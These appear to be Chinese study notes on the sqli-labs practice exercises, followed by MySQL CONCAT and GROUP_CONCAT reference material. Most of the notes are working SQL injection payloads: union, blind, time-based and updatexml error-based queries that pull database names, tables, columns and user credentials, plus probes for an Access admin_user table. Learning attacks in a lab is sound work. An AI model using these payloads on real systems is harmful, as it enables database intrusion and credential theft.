select schema_name from information_schema.schemata
select table_name from information_schema.tables where table_schema='security'
select column_name from information_schema.columns where table_name='users'
select username,password from security.users
less-01:
SELECT * FROM users WHERE id='1' LIMIT 0,1;
select SELECT
limit 0,1; 其中第一个数字是起始偏移量(从0开始计数,0代表从第一行开始),第二个数字1代表要返回的行数。
SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
--+ -- #
or and
A and B: 只有 A 和 B 都为 True 时结果才为 True
A or B: A 或 B 任一为 True 时结果即为 True
id=1
SELECT * FROM users WHERE id='1''
less-01
数据中存在3列。
system_user()
user()
current_user()
database()
version()
@@datadir
@@version_compile_os
group_concat()
concat_ws('~',A,B)
A~B
information_schema,challenges,mysql,performance_schema,security,test
security
emails,referers,uagents,users
id,username,password
group_concat(concat_ws(0x7e,username,password)) from security.users
concat_ws(0x7e,username,password) # admin~password,admin1~pass,
'1'
1
('1')
select ascii(substr((select database()),1,1));
select database() security
select ascii(substr('security',1,1));
select ascii('s')
115
burpsuite 使用: 代理
security
crow_1
if length(select database()) =8;
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+
ascii(substr((select database()),1,1))> 156
security
二分法
1,156
100
http://127.0.0.1/sqli/Less-5/?id=1'
and
ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10
99
--+
select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);
sqli-labs less01-less10
mysql 查询语句:
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
less-11
select 1=1 and 1=2;
select 1=1 or 1=2;
uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit
uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
security
uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
总结:
less-1 get
less-11 post
(1)
'
')
'))
"
")
"))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
group_concat(concat(0x7e,username,password)) from security.users
~
username~password
less-13
select length(database());
if()
长度:if(length(database())>1,1,sleep(5)); 数据库字符长度是8
left(database(),1)='a'
uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
inf
A-Z
0-9
_
less-14
uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
A or B
A and B
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
less-15
uname=admin&passwd=a' or length(database())='8'#&submit=Submit
less-16
13 ('ain')
14 "admin"
15 'ain'
16 ("admin")
uname=admin&passwd=admin") and 1=2#&submit=Submit
less-17
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,(构造语句)),1);
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)
less-18
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#
0x + Hex Encode
2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //返回正常,access數據庫
2%'and(select count(*)from admin_user)>0 and '%'=' //返回正常,存在admin_user表
2%'and(select count(username)from admin_user)>0 and '%'=' //返回正常,存在username字段
2%'and(select count(password)from admin_user)>0 and '%'=' //返回正常,存在password字段
2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' //返回正常,username長度大於4
CONCAT()
函数用于将多个字符串连接成一个字符串。
使用数据表Info作为示例,其中 SELECT id,name FROM info LIMIT 1; 的返回结果为
+----+--------+
| id | name |
+----+--------+
| 1 | BioCyc |
+----+--------+
CONCAT(str1,str2,…)
返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。可以有一个或多个参数。
SELECT CONCAT(id, ',', name) AS con FROM info LIMIT 1; 返回结果为
+----------+
| con |
+----------+
| 1,BioCyc |
+----------+
SELECT CONCAT('My', NULL, 'QL'); 返回结果为
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL |
+--------------------------+
使用函数 CONCAT_WS()。使用语法为:CONCAT_WS(separator,str1,str2,…)。CONCAT_WS() 代表 CONCAT With Separator,是 CONCAT() 的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是 CONCAT_WS() 不会忽略任何空字符串(然而会忽略所有的 NULL)。
如SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;返回结果为
+----------+
| con_ws |
+----------+
| 1_BioCyc |
+----------+
SELECT CONCAT_WS(',','First name',NULL,'Last Name');返回结果为
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name |
+----------------------------------------------+
GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。 使用表info作为示例,其中语句
SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');的返回结果为
+----------+----+--------------------------+
| locus | id | journal |
+----------+----+--------------------------+
| AB086827 | 1 | Unpublished |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+--------------------------+
GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])
在 MySQL 中,你可以得到表达式结合体的连结值。通过使用 DISTINCT 可以排除重复值。如果希望对结果中的值进行排序,可以使用 ORDER BY 子句。SEPARATOR 是一个字符串值,它被用于插入到结果值中。缺省为一个逗号(","),可以通过指定 SEPARATOR "" 完全地移除这个分隔符。可以通过变量 group_concat_max_len 设置一个最大的长度。在运行时执行的句法如下:SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
如果最大长度被设置,结果值被剪切到这个最大长度。如果分组的字符过长,可以对系统参数进行设置:SET @@global.group_concat_max_len=40000;
语句 SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
的返回结果为
+----------+------------------+
| locus | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2 |
| AF040764 | 23,24 |
+----------+------------------+
语句 SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
的返回结果为
+----------+----------------------------------------------------------+
| locus | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1 |
| AF040764 | 24_23 |
+----------+----------------------------------------------------------+
语句SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
的返回结果为
+----------+--------------------------------------------------------------------------+
| locus | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished |
| AF040764 | 24, Submitted (31-DEC-1997). 23, Unpublished |
+----------+--------------------------------------------------------------------------+